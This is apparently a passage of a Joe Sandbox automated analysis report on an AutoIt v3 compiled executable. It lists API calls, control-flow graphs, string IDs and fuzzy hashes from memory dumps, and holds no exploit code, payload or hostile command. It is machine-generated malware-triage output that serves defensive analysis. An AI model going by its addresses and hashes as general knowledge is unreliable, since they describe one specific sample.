                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D4BD7
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D4C18
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 005D4C5A
                                                                                              • _wcslen.LIBCMT ref: 005D4CC1
                                                                                              • _wcslen.LIBCMT ref: 005D4CD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 98802146-2727554177
                                                                                              • Opcode ID: 429544e74d44605b7dc733555f75b204bd7f621f82bc0183ff8de420a4873a4c
                                                                                              • Instruction ID: f8e644b044935e50f496fb0efa5f1372ac54e788bec4e3355736a46bf49df935
                                                                                              • Opcode Fuzzy Hash: 429544e74d44605b7dc733555f75b204bd7f621f82bc0183ff8de420a4873a4c
                                                                                              • Instruction Fuzzy Hash: 8C717B715043529FDB10EF69E8899ABBFE9FF98340B40142EF445973A0EBB09A49CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00593465
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00593474
                                                                                              • LoadIconW.USER32(00000063), ref: 0059348A
                                                                                              • LoadIconW.USER32(000000A4), ref: 0059349C
                                                                                              • LoadIconW.USER32(000000A2), ref: 005934AE
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005934C6
                                                                                              • RegisterClassExW.USER32(?), ref: 00593517
                                                                                                • Part of subcall function 005935AB: GetSysColorBrush.USER32(0000000F), ref: 005935DE
                                                                                                • Part of subcall function 005935AB: RegisterClassExW.USER32(00000030), ref: 00593608
                                                                                                • Part of subcall function 005935AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00593619
                                                                                                • Part of subcall function 005935AB: InitCommonControlsEx.COMCTL32(?), ref: 00593636
                                                                                                • Part of subcall function 005935AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00593646
                                                                                                • Part of subcall function 005935AB: LoadIconW.USER32(000000A9), ref: 0059365C
                                                                                                • Part of subcall function 005935AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0059366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: c1db56e58c1bc82ff8c076564e0742a402bfd7c616ea6de6286093e1fa051ae1
                                                                                              • Instruction ID: 44c80c9d4f950e96e7f8f09931a037ea6a02e75c994dbed411125016e0792d36
                                                                                              • Opcode Fuzzy Hash: c1db56e58c1bc82ff8c076564e0742a402bfd7c616ea6de6286093e1fa051ae1
                                                                                              • Instruction Fuzzy Hash: D0217C70D10759ABCB108FA5EC69AA97FF6FB08B40F00101BE604B23A0C7F909458F80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 0059CE8E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: p3f$p3f$p3f$p3f$p5f$p5f$x3f$x3f
                                                                                              • API String ID: 1385522511-3260310696
                                                                                              • Opcode ID: 23db1aea24a5bb6db75bffb93a2e14bfd8bfc87ea1a89911394374c2f0caca5c
                                                                                              • Instruction ID: 2024012ab6268128648a5a7e76e324b47e84ea731c82c04eec8294219f7e1a54
                                                                                              • Opcode Fuzzy Hash: 23db1aea24a5bb6db75bffb93a2e14bfd8bfc87ea1a89911394374c2f0caca5c
                                                                                              • Instruction Fuzzy Hash: 9F32BE75A00255AFDF24CF58C885ABABFBAFF44300F18845AE856AB391C774ED41CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 845 593aa3-593ac6 846 5d4139-5d414c call 5fa12a 845->846 847 593acc-593b35 call 5b019b call 597953 call 59bf07 call 597953 * 2 call 596e52 845->847 853 5d4153-5d415b 846->853 881 593b3b-593b48 call 596cce call 596b12 847->881 882 5d456b-5d457b call 5fa12a 847->882 855 5d415d-5d4165 853->855 856 5d416b-5d4173 853->856 855->856 859 593b64-593bd3 call 59bf07 call 593a70 call 59bf07 call 59557e call 5941c9 call 596bfa 855->859 860 5d417e-5d4186 856->860 861 5d4175-5d417c 856->861 895 593bd9-593c48 call 59bf07 * 2 call 59694e call 597af4 SetCurrentDirectoryW call 59bd2c * 2 call 5b019b call 5941a6 859->895 896 5d41b4-5d41bf 859->896 864 5d4188-5d418f 860->864 865 5d4191-5d4199 860->865 862 5d41a6-5d41af call 5fd4bf 861->862 862->859 864->862 865->859 869 5d419f-5d41a1 865->869 869->862 892 593b4d-593b5e call 596afb 881->892 888 5d4580 882->888 888->888 892->853 892->859 942 593c4c-593c51 895->942 896->895 898 5d41c5-5d41f8 call 597953 call 59636d 896->898 909 5d41fe-5d4225 call 6035cd call 5963db 898->909 910 5d4502-5d4519 call 5fa12a 898->910 909->910 923 5d422b-5d42a7 call 5b016b call 59bc23 call 59bb3d 909->923 919 593da5-593df0 call 59bd2c * 2 call 597953 call 59bd2c call 597953 call 5b01a4 910->919 945 5d42ad-5d42cf call 59bc23 923->945 946 5d446f-5d44ab call 59bc23 call 6013a0 call 5f4a0c call 5b4d0e 923->946 947 593d71-593d92 call 597953 SetCurrentDirectoryW 942->947 948 593c57-593c64 call 59ad74 942->948 963 5d42e5-5d42f0 call 6014a6 945->963 964 5d42d1-5d42e0 945->964 997 5d44ad-5d44d2 call 595c10 call 5b01a4 call 601388 946->997 947->919 960 593d94-593da2 call 5b015d call 5b01a4 947->960 948->947 959 593c6a-593c86 call 594093 call 593ff3 948->959 987 5d454e-5d4566 call 5fa12a 959->987 988 593c8c-593ca3 call 593fb8 call 5b4cf3 959->988 960->919 975 5d430d-5d4318 call 601492 963->975 976 5d42f2-5d4308 963->976 968 5d4401-5d4414 call 59bb3d 964->968 968->945 985 5d441a-5d4424 968->985 993 5d432e-5d4339 call 5ae607 975->993 994 5d431a-5d4329 975->994 976->968 990 5d4457 call 5fa486 985->990 991 5d4426-5d4434 985->991 987->947 1014 593ca5-593cc0 call 5b6755 988->1014 1015 593cc6-593cc9 988->1015 999 5d445c-5d4469 990->999 991->990 998 5d4436-5d4455 call 5940e0 991->998 993->968 1010 5d433f-5d435b call 5f9f0d 993->1010 994->968 997->919 998->999 999->945 999->946 1023 5d435d-5d4388 call 59b25f call 59bd2c 1010->1023 1024 5d438a-5d438d 1010->1024 1014->1015 1020 593df3-593df9 1014->1020 1019 593ccf-593cd4 1015->1019 1015->1020 1026 5d452f-5d4537 call 5f9dd5 1019->1026 1027 593cda-593d13 call 59b25f call 593e15 1019->1027 1020->1019 1022 593dff-5d452a 1020->1022 1022->1019 1068 5d43b6-5d43c7 call 59bc23 1023->1068 1030 5d438f-5d43b5 call 59b25f call 597d27 call 59bd2c 1024->1030 1031 5d43c9-5d43cc 1024->1031 1045 5d453c-5d453f 1026->1045 1055 593d30-593d32 1027->1055 1056 593d15-593d2c call 5b01a4 call 5b015d 1027->1056 1030->1068 1038 5d43ed-5d43f1 call 60142e 1031->1038 1039 5d43ce-5d43d7 call 5f9e3c 1031->1039 1048 5d43f6-5d4400 call 5b01a4 1038->1048 1051 5d43dd-5d43e8 call 5b01a4 1039->1051 1052 5d44d7-5d4500 call 5fa12a call 5b01a4 call 5b4d0e 1039->1052 1053 593e08-593e10 1045->1053 1054 5d4545-5d4549 1045->1054 1048->968 1051->945 1052->997 1063 593d5e-593d6b 1053->1063 1054->1053 1066 593d38-593d3b 1055->1066 1067 593e04 1055->1067 1056->1055 1063->942 1063->947 1066->1053 1073 593d41-593d44 1066->1073 1067->1053 1068->1048 1073->1045 1077 593d4a-593d59 call 5940e0 1073->1077 1077->1063
                                                                                              APIs
                                                                                                • Part of subcall function 00597953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,005D3A1C), ref: 00597973
                                                                                                • Part of subcall function 00596E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 00596E80
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00593C17
                                                                                              • _wcslen.LIBCMT ref: 00593C96
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00593D81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 2701412040-3738523708
                                                                                              • Opcode ID: 14a045c8e1919de09cf6568f72cf1d7584dd558d74a78b1e3e8584f73d3d78bf
                                                                                              • Instruction ID: b51c86b5e3774561aba3f564b06bb4b224bc64a7ec631c108f18e98ac4f1336f
                                                                                              • Opcode Fuzzy Hash: 14a045c8e1919de09cf6568f72cf1d7584dd558d74a78b1e3e8584f73d3d78bf
                                                                                              • Instruction Fuzzy Hash: 4B229A700083429FDB24EF28D895AAFBFE5BFD4314F04491EF585972A2DB709A49CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D5f$D5f$D5f$D5f$D5fD5f$Variable must be of type 'Object'.
                                                                                              • API String ID: 0-3917941627
                                                                                              • Opcode ID: 6ed9b7c71acf9fbfd547a04a4c2b639ec39eea769179b6d774ecf2b03a95c70e
                                                                                              • Instruction ID: 55dacc271a8e28e564b70d32b5df005604ae1926b39d93f9b941a3ecac940364
                                                                                              • Opcode Fuzzy Hash: 6ed9b7c71acf9fbfd547a04a4c2b639ec39eea769179b6d774ecf2b03a95c70e
                                                                                              • Instruction Fuzzy Hash: A5C27971A00215DFCF28CF58C884BAEBBB2FF59310F248569E955AB3A1D771AD41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1594 592a52-592a8b 1595 592a91-592aa7 mciSendStringW 1594->1595 1596 5d39f4-5d39f5 DestroyWindow 1594->1596 1597 592d08-592d15 1595->1597 1598 592aad-592ab5 1595->1598 1599 5d3a00-5d3a0d 1596->1599 1601 592d3a-592d41 1597->1601 1602 592d17-592d32 UnregisterHotKey 1597->1602 1598->1599 1600 592abb-592aca call 592e70 1598->1600 1603 5d3a3c-5d3a43 1599->1603 1604 5d3a0f-5d3a12 1599->1604 1615 5d3a4a-5d3a56 1600->1615 1616 592ad0-592ad8 1600->1616 1601->1598 1607 592d47 1601->1607 1602->1601 1606 592d34-592d35 call 592712 1602->1606 1603->1599 1608 5d3a45 1603->1608 1609 5d3a1e-5d3a21 FindClose 1604->1609 1610 5d3a14-5d3a1c call 597953 1604->1610 1606->1601 1607->1597 1608->1615 1614 5d3a27-5d3a34 1609->1614 1610->1614 1614->1603 1620 5d3a36-5d3a37 call 603c0b 1614->1620 1617 5d3a58-5d3a5a FreeLibrary 1615->1617 1618 5d3a60-5d3a67 1615->1618 1621 5d3a6e-5d3a7b 1616->1621 1622 592ade-592b03 call 59e650 1616->1622 1617->1618 1618->1615 1623 5d3a69 1618->1623 1620->1603 1624 5d3a7d-5d3a9a VirtualFree 1621->1624 1625 5d3aa2-5d3aa9 1621->1625 1631 592b3a-592b45 OleUninitialize 1622->1631 1632 592b05 1622->1632 1623->1621 1624->1625 1628 5d3a9c-5d3a9d call 603c71 1624->1628 1625->1621 1629 5d3aab 1625->1629 1628->1625 1636 5d3ab0-5d3ab4 1629->1636 1635 592b4b-592b50 1631->1635 1631->1636 1634 592b08-592b38 call 593047 call 592ff0 1632->1634 1634->1631 1638 5d3ac5-5d3ad2 call 603c45 1635->1638 1639 592b56-592b60 1635->1639 1636->1635 1640 5d3aba-5d3ac0 1636->1640 1652 5d3ad4 1638->1652 1643 592d49-592d56 call 5afb27 1639->1643 1644 592b66-592be7 call 59bd2c call 592f86 call 592e17 call 5b01a4 call 592dbe call 59bd2c call 59e650 call 592e40 call 5b01a4 1639->1644 1640->1635 1643->1644 1654 592d5c 1643->1654 1656 5d3ad9-5d3afb call 5b015d 1644->1656 1684 592bed-592c11 call 5b01a4 1644->1684 1652->1656 1654->1643 1663 5d3afd 1656->1663 1666 5d3b02-5d3b24 call 5b015d 1663->1666 1672 5d3b26 1666->1672 1674 5d3b2b-5d3b4d call 5b015d 1672->1674 1680 5d3b4f 1674->1680 1683 5d3b54-5d3b61 call 5f6d63 1680->1683 1689 5d3b63 1683->1689 1684->1666 1690 592c17-592c3b call 5b01a4 1684->1690 1693 5d3b68-5d3b75 call 5abd6a 1689->1693 1690->1674 1694 592c41-592c5b call 5b01a4 1690->1694 1699 5d3b77 1693->1699 1694->1683 1700 592c61-592c85 call 592e17 call 5b01a4 1694->1700 1701 5d3b7c-5d3b89 call 603b9f 1699->1701 1700->1693 1709 592c8b-592c93 1700->1709 1707 5d3b8b 1701->1707 1710 5d3b90-5d3b9d call 603c26 1707->1710 1709->1701 1711 592c99-592cb7 call 59bd2c call 592f4c 1709->1711 1716 5d3b9f 1710->1716 1711->1710 1719 592cbd-592ccb 1711->1719 1720 5d3ba4-5d3bb1 call 603c26 1716->1720 1719->1720 1721 592cd1-592d07 call 59bd2c * 3 call 592eb8 1719->1721 1726 5d3bb3 1720->1726 1726->1726
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00592A9B
                                                                                              • OleUninitialize.OLE32(?,00000000), ref: 00592B3A
                                                                                              • UnregisterHotKey.USER32(?), ref: 00592D1F
                                                                                              • DestroyWindow.USER32(?), ref: 005D39F5
                                                                                              • FreeLibrary.KERNEL32(?), ref: 005D3A5A
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D3A87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 1ad8d57fdd062f6ae7e9f07018eef3730f037f5df75b27ac73316d4b673523c8
                                                                                              • Instruction ID: 2e3c5afd21a0ab09722dcf733a45e9da471a4777fac938c23c3d1f73550fa664
                                                                                              • Opcode Fuzzy Hash: 1ad8d57fdd062f6ae7e9f07018eef3730f037f5df75b27ac73316d4b673523c8
                                                                                              • Instruction Fuzzy Hash: 45D15D31701222DFDB29EF19C999B69FBA5BF45700F1441AEE44AAB352CB70AD12CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1733 60874a-60878c call 5d22f0 call 598e70 1738 6087a2 1733->1738 1739 60878e-60879c call 59c92d 1733->1739 1740 6087a4-6087b0 1738->1740 1739->1738 1745 60879e-6087a0 1739->1745 1743 6087b6 1740->1743 1744 60886d-60891f call 598e70 call 59557e call 5bd913 call 5b93c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 1740->1744 1746 6087ba-6087c0 1743->1746 1779 608921-60892d call 5fe387 1744->1779 1780 608973-608984 call 59e650 1744->1780 1745->1740 1748 6087c2-6087c8 1746->1748 1749 6087ca-6087cf 1746->1749 1751 6087d6 1748->1751 1753 6087d1-6087d4 1749->1753 1754 6087d9-6087df 1749->1754 1751->1754 1753->1751 1756 6087e1-6087e4 1754->1756 1757 608848-60884a 1754->1757 1756->1757 1760 6087e6-6087e9 1756->1760 1758 60884b-60884e 1757->1758 1761 608850-608856 1758->1761 1762 608858 1758->1762 1764 608844-608846 1760->1764 1765 6087eb-6087ee 1760->1765 1766 60885c-608867 1761->1766 1762->1766 1769 60883d-60883e 1764->1769 1765->1764 1768 6087f0-6087f3 1765->1768 1766->1744 1766->1746 1771 608840-608842 1768->1771 1772 6087f5-6087f8 1768->1772 1769->1758 1771->1769 1772->1771 1773 6087fa-6087fd 1772->1773 1775 60883b 1773->1775 1776 6087ff-608802 1773->1776 1775->1769 1776->1775 1778 608804-608807 1776->1778 1782 608834-608839 1778->1782 1783 608809-60880c 1778->1783 1779->1780 1788 60892f-60893a call 5fe9c5 1779->1788 1791 608987-60898b call 59bd2c 1780->1791 1782->1758 1783->1782 1786 60880e-608811 1783->1786 1789 608813-608816 1786->1789 1790 60882d-608832 1786->1790 1799 608940-608967 GetFileAttributesW SetFileAttributesW 1788->1799 1800 6089cf 1788->1800 1789->1790 1793 608818-60881b 1789->1793 1790->1758 1798 608990-608998 1791->1798 1796 608826-60882b 1793->1796 1797 60881d-608820 1793->1797 1796->1758 1797->1796 1801 60899b-6089af call 59e650 1797->1801 1803 6089b1-6089b3 1799->1803 1804 608969-608971 SetCurrentDirectoryW 1799->1804 1802 6089d3-6089e5 call 609f9f 1800->1802 1801->1798 1811 6089ea-6089ec 1802->1811 1806 608a02-608a0c SetCurrentDirectoryW 1803->1806 1807 6089b5-6089cd SetCurrentDirectoryW call 5b4d13 1803->1807 1804->1780 1806->1791 1807->1802 1811->1806 1813 6089ee-6089fb call 59e650 1811->1813 1813->1806
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608907
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0060891B
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00608945
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0060895F
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608971
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 006089BA
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00608A0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                              • String ID: *.*
                                                                                              • API String ID: 769691225-438819550
                                                                                              • Opcode ID: da9a4af702281368b1bc88a27704db1037d2eb2cb460f875ba69b9287138d4e6
                                                                                              • Instruction ID: 589beb005a148f05a5667073d68ed322b735a94487b1be51652e33b04b940622
                                                                                              • Opcode Fuzzy Hash: da9a4af702281368b1bc88a27704db1037d2eb2cb460f875ba69b9287138d4e6
                                                                                              • Instruction Fuzzy Hash: 57818E725443019FCB28EF54C484AABB7EABF95310F54882AF4C5D7291DB34ED45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1898 5c90d5-5c90e5 1899 5c90ff-5c9101 1898->1899 1900 5c90e7-5c90fa call 5bf656 call 5bf669 1898->1900 1902 5c9469-5c9476 call 5bf656 call 5bf669 1899->1902 1903 5c9107-5c910d 1899->1903 1916 5c9481 1900->1916 1921 5c947c call 5c2b7c 1902->1921 1903->1902 1906 5c9113-5c913e 1903->1906 1906->1902 1909 5c9144-5c914d 1906->1909 1912 5c914f-5c9162 call 5bf656 call 5bf669 1909->1912 1913 5c9167-5c9169 1909->1913 1912->1921 1914 5c916f-5c9173 1913->1914 1915 5c9465-5c9467 1913->1915 1914->1915 1919 5c9179-5c917d 1914->1919 1920 5c9484-5c9489 1915->1920 1916->1920 1919->1912 1924 5c917f-5c9196 1919->1924 1921->1916 1927 5c9198-5c919b 1924->1927 1928 5c91b3-5c91bc 1924->1928 1929 5c919d-5c91a3 1927->1929 1930 5c91a5-5c91ae 1927->1930 1931 5c91be-5c91d5 call 5bf656 call 5bf669 call 5c2b7c 1928->1931 1932 5c91da-5c91e4 1928->1932 1929->1930 1929->1931 1935 5c924f-5c9269 1930->1935 1960 5c939c 1931->1960 1933 5c91eb-5c91ec call 5c3bb0 1932->1933 1934 5c91e6-5c91e8 1932->1934 1942 5c91f1-5c9209 call 5c2d58 * 2 1933->1942 1934->1933 1937 5c933d-5c9346 call 5cfc3b 1935->1937 1938 5c926f-5c927f 1935->1938 1951 5c9348-5c935a 1937->1951 1952 5c93b9 1937->1952 1938->1937 1941 5c9285-5c9287 1938->1941 1941->1937 1945 5c928d-5c92b3 1941->1945 1968 5c920b-5c9221 call 5bf669 call 5bf656 1942->1968 1969 5c9226-5c924c call 5c97b4 1942->1969 1945->1937 1949 5c92b9-5c92cc 1945->1949 1949->1937 1956 5c92ce-5c92d0 1949->1956 1951->1952 1954 5c935c-5c936b GetConsoleMode 1951->1954 1958 5c93bd-5c93d5 ReadFile 1952->1958 1954->1952 1959 5c936d-5c9371 1954->1959 1956->1937 1961 5c92d2-5c92fd 1956->1961 1963 5c93d7-5c93dd 1958->1963 1964 5c9431-5c943c GetLastError 1958->1964 1959->1958 1965 5c9373-5c938d ReadConsoleW 1959->1965 1966 5c939f-5c93a9 call 5c2d58 1960->1966 1961->1937 1967 5c92ff-5c9312 1961->1967 1963->1964 1972 5c93df 1963->1972 1970 5c943e-5c9450 call 5bf669 call 5bf656 1964->1970 1971 5c9455-5c9458 1964->1971 1975 5c93ae-5c93b7 1965->1975 1976 5c938f GetLastError 1965->1976 1966->1920 1967->1937 1980 5c9314-5c9316 1967->1980 1968->1960 1969->1935 1970->1960 1977 5c945e-5c9460 1971->1977 1978 5c9395-5c939b call 5bf633 1971->1978 1974 5c93e2-5c93f4 1972->1974 1974->1966 1985 5c93f6-5c93fa 1974->1985 1975->1974 1976->1978 1977->1966 1978->1960 1980->1937 1988 5c9318-5c9338 1980->1988 1991 5c93fc-5c940c call 5c8df1 1985->1991 1992 5c9413-5c941e 1985->1992 1988->1937 2003 5c940f-5c9411 1991->2003 1997 5c942a-5c942f call 5c8c31 1992->1997 1998 5c9420 call 5c8f41 1992->1998 2004 5c9425-5c9428 1997->2004 1998->2004 2003->1966 2004->2003
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a92345fa904d403b00fbb528ed59fd6328b1b8b712e6afe30b1dbd50614dd68b
                                                                                              • Instruction ID: 6638a3839af765a2e152192c44003c634e16f82a85e26d688e8999f2070c6e0b
                                                                                              • Opcode Fuzzy Hash: a92345fa904d403b00fbb528ed59fd6328b1b8b712e6afe30b1dbd50614dd68b
                                                                                              • Instruction Fuzzy Hash: DCC1A1B4A0428AAFCF11DFE8C849FADBFB5BF49310F18455DE814A7292C7709942CB61
                                                                                              Uniqueness
